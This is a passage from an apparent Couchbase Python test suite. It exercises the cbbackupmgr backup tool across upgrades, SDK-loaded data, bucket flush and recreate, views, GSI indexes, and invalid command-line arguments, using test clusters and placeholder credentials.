BucketOperationHelper().delete_bucket_or_assert(self.backupset.cluster_host,
"default", self)
def test_backup_restore_after_online_upgrade(self):
"""
1. Test has to be supplied initial_version to be installed and
upgrade_version to be upgraded to
2. Installs initial_version on the servers
3. Load data and backup in pre-upgrade
4. Install upgrade version on 2 nodes. Use swap rebalance to upgrade
cluster
5. Operation after upgrade cluster
6. Restores data and validates
"""
servers = copy.deepcopy(self.servers)
self.vbuckets = self.initial_vbuckets
if len(servers) != 4:
self.fail("\nThis test needs exactly 4 nodes to run! ")
self._install(servers)
self.sleep(5, "wait for node ready")
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size,
end=self.num_items)
rebalance = self.cluster.async_rebalance(servers[:self.nodes_init],
[servers[int(self.nodes_init) - 1]], [])
rebalance.result()
self.sleep(15)
rest = RestConnection(self.master)
rest.create_bucket(bucket='default', ramQuotaMB=512)
self.buckets = rest.get_buckets()
self._load_all_buckets(self.master, gen, "create", 0)
cb_version = rest.get_nodes_version()
initial_compression_mode = "off"
if cb_version[:5] in COUCHBASE_FROM_4DOT6:
self.cluster_flag = "--cluster"
""" create index """
if 5.5 > float(cb_version[:3]):
self.compression_mode = initial_compression_mode
if self.create_gsi:
if "5" > rest.get_nodes_version()[:1]:
if self.gsi_type == "forestdb":
self.fail("Need to set param self.gsi_type=memory_optimized")
rest.set_indexer_storage_mode(storageMode="memory_optimized")
else:
rest.set_indexer_storage_mode(storageMode="plasma")
self.create_indexes()
self.backup_create()
if self.backupset.number_of_backups > 1:
self.log.info("Start doing multiple backup")
for i in range(1, self.backupset.number_of_backups + 1):
self._backup_restore_with_ops()
else:
self.backup_cluster_validate()
start = randrange(1, self.backupset.number_of_backups + 1)
if start == self.backupset.number_of_backups:
end = start
else:
end = randrange(start, self.backupset.number_of_backups + 1)
self.sleep(5)
self.backup_list()
""" Start to online upgrade using swap rebalance """
self.initial_version = self.upgrade_versions[0]
if self.force_version_upgrade:
self.initial_version = self.force_version_upgrade
self.sleep(self.sleep_time,
"Pre-setup of old version is done. Wait for online upgrade to: "
"{0} version".format(self.initial_version))
self.product = 'couchbase-server'
self._install(servers[2:])
self.sleep(self.sleep_time,
"Installation of new version is done. Wait for rebalance")
self.log.info(
"Rebalanced in upgraded nodes and rebalanced out nodes with old version")
add_node_services = [self.add_node_services]
if "-" in self.add_node_services:
add_node_services = self.add_node_services.split("-")
self.cluster.rebalance(servers, servers[2:], servers[:2],
services=add_node_services)
self.sleep(15)
self.backupset.cluster_host = servers[2]
""" Upgrade is done """
self.log.info("** Upgrade is done **")
healthy = False
timeout = 0
while not healthy:
healthy = RestHelper(RestConnection(self.backupset.cluster_host)).is_cluster_healthy()
if not healthy:
if timeout == 120:
self.fail("Node %s is not ready after 2 mins" % self.backupset.cluster_host)
else:
self.sleep(5, "Wait for server up ")
timeout += 5
else:
healthy = True
if "5" <= RestConnection(servers[2]).get_nodes_version()[:1]:
for user in self.users_check_restore:
user_name = user.replace('[', '_').replace(']', '_')
testuser = [{'id': user_name, 'name': user_name,
'password': 'password'}]
rolelist = [{'id': user_name, 'name': user_name,
'roles': user}]
self.log.info("**** add built-in '%s' user to node %s ****" % (testuser[0]["name"],
servers[2].ip))
RbacBase().create_user_source(testuser, 'builtin', servers[2])
self.sleep(10)
self.log.info("**** add '%s' role to '%s' user ****" % (rolelist[0]["roles"],
testuser[0]["name"]))
status = RbacBase().add_user_role(rolelist, RestConnection(servers[2]), 'builtin')
self.log.info(status)
if self.backupset.number_of_backups_after_upgrade:
self.backupset.number_of_backups += \
self.backupset.number_of_backups_after_upgrade
if "5" <= RestConnection(servers[2]).get_nodes_version()[:1]:
self.add_built_in_server_user(node=servers[2])
for i in range(1, self.backupset.number_of_backups_after_upgrade + 2):
self.log.info("_backup_restore_with_ops #{0} started...".format(i))
validate_dir_struct = True
if i > 2:
validate_dir_struct = False
self._backup_restore_with_ops(node=self.backupset.cluster_host, repeats=1,
validate_directory_structure=validate_dir_struct)
self.backup_list()
""" merged after upgrade """
if self.after_upgrade_merged:
self.backupset.start = 1
self.backupset.end = len(self.backups)
self.backup_merge_validate()
self.backup_list()
backupsets = [self.backupset]
if "5" <= RestConnection(servers[2]).get_nodes_version()[:1]:
for user in self.users_check_restore:
new_backupset = copy.deepcopy(self.backupset)
new_backupset.restore_cluster_host_username = user.replace('[', '_').replace(']', '_')
backupsets.append(new_backupset)
for backupset in backupsets:
self.backupset = backupset
if self.bucket_flush:
self.log.info("Start to flush bucket")
rest = RestConnection(servers[2])
rest.flush_bucket()
else:
self.bucket_helper.delete_bucket_or_assert(self.backupset.cluster_host,
"default", self)
""" Re-create default bucket on upgrade cluster """
RestConnection(servers[2]).create_bucket(bucket='default',
ramQuotaMB=512,
compressionMode=initial_compression_mode)
self.sleep(5)
self.total_buckets = len(self.buckets)
if self.after_upgrade_merged:
self.backupset.end = 1
""" restore back to cluster """
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
if self.create_gsi:
self.verify_gsi()
def test_backup_restore_with_python_sdk(self):
"""
1. Note that python sdk has to be installed on all nodes before running this test
2. Connects to default bucket on cluster host using Python SDK
- loads specifed number of items
3. Creates a backupset, backsup data and validates
4. Restores data and validates
5. Connects to default bucket on restore host using Python SDK
6. Retrieves cas and flgas of each doc on both cluster and restore host
- validates if they are equal
"""
testuser = [{'id': 'default', 'name': 'default', 'password': 'password'}]
rolelist = [{'id': 'default', 'name': 'default', 'roles': 'admin'}]
self.add_built_in_server_user(testuser, rolelist)
try:
cb = Bucket('couchbase://' + self.backupset.cluster_host.ip + '/default',
password="password")
if cb is not None:
self.log.info("Established connection to bucket on cluster host"
" using python SDK")
else:
self.fail("Failed to establish connection to bucket on cluster host"
" using python SDK")
except Exception, ex:
self.fail(str(ex))
self.log.info("Loading bucket with data using python SDK")
for i in range(1, self.num_items + 1):
cb.upsert("doc" + str(i), "value" + str(i))
cluster_host_data = {}
for i in range(1, self.num_items + 1):
key = "doc" + str(i)
value_obj = cb.get(key=key)
cluster_host_data[key] = {}
cluster_host_data[key]["cas"] = str(value_obj.cas)
cluster_host_data[key]["flags"] = str(value_obj.flags)
self.backup_create()
self.backup_cluster_validate()
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
self.add_built_in_server_user(testuser, rolelist, self.backupset.restore_cluster_host)
try:
cb = Bucket('couchbase://' + self.backupset.restore_cluster_host.ip + '/default',
password="password")
if cb is not None:
self.log.info("Established connection to bucket on restore host " \
"using python SDK")
else:
self.fail("Failed to establish connection to bucket on restore " \
"host using python SDK")
except Exception, ex:
self.fail(str(ex))
restore_host_data = {}
for i in range(1, self.num_items + 1):
key = "doc" + str(i)
value_obj = cb.get(key=key)
restore_host_data[key] = {}
restore_host_data[key]["cas"] = str(value_obj.cas)
restore_host_data[key]["flags"] = str(value_obj.flags)
self.log.info("Comparing cluster host data cas and flags against restore host data")
for i in range(1, self.num_items + 1):
key = "doc" + str(i)
if cluster_host_data[key]["cas"] != restore_host_data[key]["cas"]:
self.fail("CAS mismatch for key: {0}".format(key))
if cluster_host_data[key]["flags"] != restore_host_data[key]["flags"]:
self.fail("Flags mismatch for key: {0}".format(key))
self.log.info("Successfully validated cluster host data cas and flags " \
"against restore host data")
def test_backup_restore_with_flush(self):
"""
1. Test should be run with same-cluster=True
2. Creates specified bucket on the cluster and loads it with given number of items
3. Creates a backupset - backsup data and validates
4. Flushes the bucket
5. Restores data and validates
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster_validate()
rest = RestConnection(self.backupset.cluster_host)
rest.flush_bucket()
self.log.info("Flushed default bucket - restoring data now..")
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
def test_backup_restore_with_recreate(self):
"""
1. Test should be run with same-cluster=True
2. Creates specified bucket on the cluster and loads it with given number of items
3. Creates a backupset - backsup data and validates
4. Deletes the bucket and recreates it
5. Restores data and validates
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster_validate()
rest = RestConnection(self.backupset.cluster_host)
rest.delete_bucket()
bucket_name = "default"
rest_helper = RestHelper(rest)
rest.create_bucket(bucket=bucket_name, ramQuotaMB=512)
bucket_ready = rest_helper.vbucket_map_ready(bucket_name)
if not bucket_ready:
self.fail("Bucket {0} is not created after 120 seconds.".format(bucket_name))
self.log.info("Deleted {0} bucket and recreated it - restoring it now.."\
.format(bucket_name))
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
def test_backup_create_negative_args(self):
"""
Validates error messages for negative inputs of create command
"""
remote_client = RemoteMachineShellConnection(self.backupset.backup_host)
cmd = "config"
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
# ['cbbackupmgr config [<args>]', '', 'Required Flags:', '', ' -a,--archive The archive directory to use', ' -r,--repo The name of the backup repository to create and', ' configure', '', 'Optional Flags:', '', ' --exclude-buckets A comma separated list of buckets to exclude from', ' backups. All buckets except for the ones specified', ' will be backed up.', ' --include-buckets A comma separated list of buckets to back up. Only', ' buckets in this list are backed up.', ' --disable-bucket-config Disables backing up bucket configuration', ' information', ' --disable-views Disables backing up view definitions', ' --disable-gsi-indexes Disables backing up GSI index definitions', ' --disable-ft-indexes Disables backing up Full Text index definitions', ' --disable-data Disables backing up cluster data', ' -h,--help Prints the help message', '']
self.assertEqual(output[0], "cbbackupmgr config [<args>]", "Expected error message not thrown")
cmd = "config --archive"
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --archive", "Expected error message not thrown")
cmd = "config --archive {0}".format(self.backupset.directory)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Flag required, but not specified: -r/--repo", "Expected error message not thrown")
cmd = "config --archive {0} --repo".format(self.backupset.directory)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --repo", "Expected error message not thrown")
self.backup_create()
cmd = "config --archive {0} --repo {1}".format(self.backupset.directory, self.backupset.name)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
remote_client.disconnect()
self.assertEqual(output[0], "Backup repository creation failed: Backup Repository `backup` exists",
"Expected error message not thrown")
def test_backup_cluster_restore_negative_args(self):
"""
Validates error messages for negative inputs of cluster or restore command - command parameter
decides which command to test
"""
remote_client = RemoteMachineShellConnection(self.backupset.backup_host)
self.backup_create()
cmd_to_test = self.input.param("command", "backup")
if cmd_to_test == "restore":
cmd = cmd_to_test + " --archive {0} --repo {1} --host http://{2}:{3} --username {4} \
--password {5}".format(self.backupset.directory,
self.backupset.name,
self.backupset.cluster_host.ip,
self.backupset.cluster_host.port,
self.backupset.cluster_host_username,
self.backupset.cluster_host_password)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertTrue("Error restoring cluster: Backup backup doesn't contain any backups" in output[-1],
"Expected error message not thrown")
self.backup_cluster()
cmd = cmd_to_test
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
cmd_test = cmd_to_test
if cmd_to_test.startswith('"') and cmd_to_test.endswith('"'):
cmd_test = cmd_to_test[1:-1]
self.assertEqual(output[0], "cbbackupmgr {} [<args>]".format(cmd_test))
cmd = cmd_to_test + " --archive"
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --archive", "Expected error message not thrown")
cmd = cmd_to_test + " --archive abc -c http://localhost:8091 -u Administrator -p password -r aa"
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Error: Archive directory `abc` doesn't exist", "Expected error message not thrown")
cmd = cmd_to_test + " --archive {0} -c http://localhost:8091 -u Administrator -p password".format(
self.backupset.directory)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Flag required, but not specified: -r/--repo", "Expected error message not thrown")
cmd = cmd_to_test + " --archive {0} --repo".format(self.backupset.directory)
command = "{0}/cbbackupmgr {1} -c http://localhost:8091 -u Administrator -p password -r".format(
self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --repo", "Expected error message not thrown")
cmd = cmd_to_test + " --archive {0} --repo {1} -u Administrator -p password".format(self.backupset.directory,
self.backupset.name)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Flag required, but not specified: -c/--cluster",
"Expected error message not thrown")
cmd = cmd_to_test + " --archive {0} --repo {1} -c -u Administrator -p password -r repo".format(
self.backupset.directory, self.backupset.name)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: -c", "Expected error message not thrown")
cmd = cmd_to_test + " --archive {0} --repo {1} -c http://{2}:{3}".format(self.backupset.directory,
self.backupset.name,
self.backupset.cluster_host.ip,
self.backupset.cluster_host.port)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Flag required, but not specified: -u/--username",
"Expected error message not thrown")
cmd = cmd_to_test + " --archive {0} --repo {1} --cluster http://{2}:{3} \
--username".format(self.backupset.directory,
self.backupset.name,
self.backupset.cluster_host.ip,
self.backupset.cluster_host.port)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --username", "Expected error message not thrown")
cmd = cmd_to_test + " --archive {0} --repo {1} --cluster http://{2}:{3} \
--username {4}".format(self.backupset.directory,
self.backupset.name,
self.backupset.cluster_host.ip,
self.backupset.cluster_host.port,
self.backupset.cluster_host_username)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Flag required, but not specified: -p/--password",
"Expected error message not thrown")
cmd = cmd_to_test + " --archive {0} --repo abc --cluster http://{1}:{2} --username {3} \
--password {4}".format(self.backupset.directory,
self.backupset.cluster_host.ip,
self.backupset.cluster_host.port,
self.backupset.cluster_host_username,
self.backupset.cluster_host_password)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
part_message = "backing up"
if cmd_to_test.startswith('"') and cmd_to_test.endswith('"'):
cmd_test = cmd_to_test[1:-1]
if cmd_test == "restore":
part_message = 'restoring'
self.assertTrue("Error {0} cluster: Backup Repository `abc` not found"\
.format(part_message) in output[-1],
"Expected error message not thrown. Actual output %s " % output[-1])
cmd = cmd_to_test + " --archive {0} --repo {1} --cluster abc --username {2} \
--password {3}".format(self.backupset.directory,
self.backupset.name,
self.backupset.cluster_host_username,
self.backupset.cluster_host_password)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertTrue("Error {0} cluster: dial tcp:".format(part_message) in output[-1],
"Expected error message not thrown")
cmd = cmd_to_test + " --archive {0} --repo {1} --cluster http://{2}:{3} --username abc \
--password {4}".format(self.backupset.directory,
self.backupset.name,
self.backupset.cluster_host.ip,
self.backupset.cluster_host.port,
self.backupset.cluster_host_password)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertTrue("check username and password" in output[-1], "Expected error message not thrown")
cmd = cmd_to_test + " --archive {0} --repo {1} --cluster http://{2}:{3} --username {4} \
--password abc".format(self.backupset.directory,
self.backupset.name,
self.backupset.cluster_host.ip,
self.backupset.cluster_host.port,
self.backupset.cluster_host_username)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
remote_client.disconnect()
self.assertTrue("check username and password" in output[-1], "Expected error message not thrown")
def test_backup_list_negative_args(self):
"""
Validates error messages for negative inputs of list command
"""
remote_client = RemoteMachineShellConnection(self.backupset.backup_host)
self.backup_create()
cmd = "list"
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "cbbackupmgr list [<args>]", "Expected error message not thrown")
cmd = "list --archive"
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --archive", "Expected error message not thrown")
cmd = "list --archive abc".format(self.backupset.directory)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
remote_client.disconnect()
self.assertTrue("Error: Archive directory `abc` doesn't exist" in output[-1],
"Expected error message not thrown")
def test_backup_compact_negative_args(self):
"""
Validates error messages for negative inputs of compact command
"""
remote_client = RemoteMachineShellConnection(self.backupset.backup_host)
self.backup_create()
self.backup_cluster()
cmd = "compact"
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "cbbackupmgr compact [<args>]",
"Expected error message not thrown")
cmd = "compact --archive"
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --archive",
"Expected error message not thrown")
cmd = "compact --archive {0}".format(self.backupset.directory)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Flag required, but not specified: -r/--repo",
"Expected error message not thrown")
cmd = "compact --archive {0} --repo".format(self.backupset.directory)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --repo",
"Expected error message not thrown")
cmd = "compact --archive {0} --repo {1}".format(self.backupset.directory,
self.backupset.name)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Flag required, but not specified: -/--backup",
"Expected error message not thrown")
cmd = "compact --archive {0} --repo {1} --backup" \
.format(self.backupset.directory, self.backupset.name)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --backup",
"Expected error message not thrown")
cmd = "compact --archive abc --repo {0} --backup {1}" \
.format(self.backupset.name, self.backups[0])
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertTrue("Error opening archive at abc due to `Not an archive directory" \
in output[-1],
"Expected error message not thrown")
cmd = "compact --archive {0} --repo abc --backup {1}" \
.format(self.backupset.directory, self.backups[0])
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertTrue("Backup Repository `abc` not found" in output[-1],
"Expected error message not thrown")
cmd = "compact --archive {0} --repo {1} --backup abc".format(self.backupset.directory,
self.backupset.name)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
remote_client.disconnect()
self.assertTrue("Compacting incr backup `abc` of backup `backup` failed:" in output[-1],
"Expected error message not thrown")
def test_backup_merge_negative_args(self):
"""
Validates error messages for negative inputs of merge command
"""
remote_client = RemoteMachineShellConnection(self.backupset.backup_host)
self.backup_create()
cmd = "merge"
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "cbbackupmgr merge [<args>]", "Expected error message not thrown")
cmd = "merge --archive -c http://localhost:8091 -u Administrator -p password -r aa"
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --archive", "Expected error message not thrown")
cmd = "merge --archive {0}".format(self.backupset.directory)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Flag required, but not specified: -r/--repo", "Expected error message not thrown")
cmd = "merge --archive {0} --repo".format(self.backupset.directory)
command = "{0}/cbbackupmgr {1} -r".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --repo", "Expected error message not thrown")
cmd = "merge --archive {0} --repo {1}".format(self.backupset.directory, self.backupset.name)
command = "{0}/cbbackupmgr {1} --start start --end end".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Error merging data: Backup backup doesn't contain any backups",
"Expected error message not thrown")
self._take_n_backups(n=2)
cmd = "merge --archive {0} --repo {1}".format(self.backupset.directory, self.backupset.name)
command = "{0}/cbbackupmgr {1} --start bbb --end end".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Error merging data: Error restoring data, `bbb` is invalid start point",
"Expected error message not thrown")
cmd = "merge --archive {0} --repo {1} --start".format(self.backupset.directory, self.backupset.name)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --start", "Expected error message not thrown")
cmd = "merge --archive {0} --repo {1} --start {2}".format(self.backupset.directory,
self.backupset.name, self.backups[0])
command = "{0}/cbbackupmgr {1} --end aa".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Error merging data: Error restoring data, `aa` is invalid end point",
"Expected error message not thrown")
cmd = "merge --archive {0} --repo {1} --start {2} --end".format(self.backupset.directory,
self.backupset.name, self.backups[0])
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --end", "Expected error message not thrown")
cmd = "merge --archive abc --repo {0} --start {1} --end {2}".format(self.backupset.name,
self.backups[0], self.backups[1])
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertTrue("Error: Archive directory `abc` doesn't exist" in output[-1],
"Expected error message not thrown")
cmd = "merge --archive {0} --repo abc --start {1} --end {2}".format(self.backupset.directory,
self.backups[0], self.backups[1])
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertTrue("Error merging data: Backup Repository `abc` not found" in output[-1],
"Expected error message not thrown")
cmd = "merge --archive {0} --repo {1} --start abc --end {2}".format(self.backupset.directory,
self.backupset.name, self.backups[1])
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertTrue("Error merging data: Error restoring data, `abc` is invalid start point" in output[-1],
"Expected error message not thrown")
cmd = "merge --archive {0} --repo {1} --start {2} --end abc".format(self.backupset.directory,
self.backupset.name, self.backups[0])
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertTrue("Error merging data: Error restoring data, `abc` is invalid end point" in output[-1],
"Expected error message not thrown")
cmd = "merge --archive {0} --repo {1} --start {2} --end {3}".format(self.backupset.directory,
self.backupset.name,
self.backups[1], self.backups[0])
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
remote_client.disconnect()
self.assertTrue("Error merging data: start point `{0}` is after end point `{1}`".format
(self.backups[1], self.backups[0]) in output[-1],
"Expected error message not thrown")
def test_backup_remove_negative_args(self):
"""
Validates error messages for negative inputs of remove command
"""
remote_client = RemoteMachineShellConnection(self.backupset.backup_host)
self.backup_create()
self.backup_cluster()
cmd = "remove"
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "cbbackupmgr remove [<args>]", "Expected error message not thrown")
cmd = "remove --archive -c http://localhost:8091 -u Administrator -p password -r aa"
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --archive", "Expected error message not thrown")
cmd = "remove --archive {0}".format(self.backupset.directory)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Flag required, but not specified: -r/--repo", "Expected error message not thrown")
cmd = "remove --archive {0} --repo".format(self.backupset.directory)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertEqual(output[0], "Expected argument for option: --repo", "Expected error message not thrown")
cmd = "remove --archive abc --repo {0}".format(self.backupset.name)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
self.assertTrue("Error: Archive directory `abc` doesn't exist" in output[-1],
"Expected error message not thrown")
cmd = "remove --archive {0} --repo abc".format(self.backupset.directory)
command = "{0}/cbbackupmgr {1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
remote_client.disconnect()
self.assertTrue("Backup Repository `abc` not found" in output[-1],
"Expected error message not thrown")
def test_backup_restore_with_views(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backupset
3. Creates a simple view on source cluster
4. Backsup data and validates
5. Restores data ans validates
6. Ensures that same view is created in restore cluster
"""
if Bucket.Type.EPHEMERAL in \
self.input.param("bucket_type", Bucket.Type.MEMBASE):
self.log.info("\n****** view does not support on ephemeral bucket ******")
return
rest_src = RestConnection(self.backupset.cluster_host)
rest_src.add_node(self.servers[1].rest_username, self.servers[1].rest_password,
self.servers[1].ip, services=['index', 'kv'])
rebalance = self.cluster.async_rebalance(self.cluster_to_backup, [], [])
rebalance.result()
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
default_map_func = "function (doc) {\n emit(doc._id, doc);\n}"
default_view_name = "test"
default_ddoc_name = "ddoc_test"
prefix = "dev_"
query = {"full_set": "true", "stale": "false", "connection_timeout": 60000}
view = View(default_view_name, default_map_func)
task = self.cluster.async_create_view(self.backupset.cluster_host,
default_ddoc_name, view, "default")
task.result()
self.backup_cluster_validate()
rest_target = RestConnection(self.backupset.restore_cluster_host)
rest_target.add_node(self.input.clusters[0][1].rest_username,
self.input.clusters[0][1].rest_password,
self.input.clusters[0][1].ip, services=['kv', 'index'])
rebalance = self.cluster.async_rebalance(self.cluster_to_restore, [], [])
rebalance.result()
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
try:
result = self.cluster.query_view(self.backupset.restore_cluster_host,
prefix + default_ddoc_name,
default_view_name, query, timeout=30)
self.assertEqual(len(result['rows']), self.num_items,
"Querying view on restore cluster did not return expected number of items")
self.log.info("Querying view on restore cluster returned expected number of items")
except TimeoutError:
self.fail("View could not be queried in restore cluster within timeout")
def test_backup_restore_with_gsi(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backupset
3. Creates a GSI index on source cluster
4. Backsup data and validates
5. Restores data ans validates
6. Ensures that same gsi index is created in restore cluster
"""
rest_src = RestConnection(self.backupset.cluster_host)
self.cluster_storage_mode = \
rest_src.get_index_settings()["indexer.settings.storage_mode"]
self.log.info("index storage mode: {0}".format(self.cluster_storage_mode))
rest_src.add_node(self.servers[1].rest_username, self.servers[1].rest_password,
self.servers[1].ip, services=['kv', 'index'])
rebalance = self.cluster.async_rebalance(self.cluster_to_backup, [], [])
rebalance.result()
self.test_storage_mode = self.cluster_storage_mode
if Bucket.Type.EPHEMERAL in self.bucket_type:
self.log.info("ephemeral bucket needs to set backup cluster to memopt for gsi.")
self.test_storage_mode = "memory_optimized"
self._reset_storage_mode(rest_src, self.test_storage_mode)
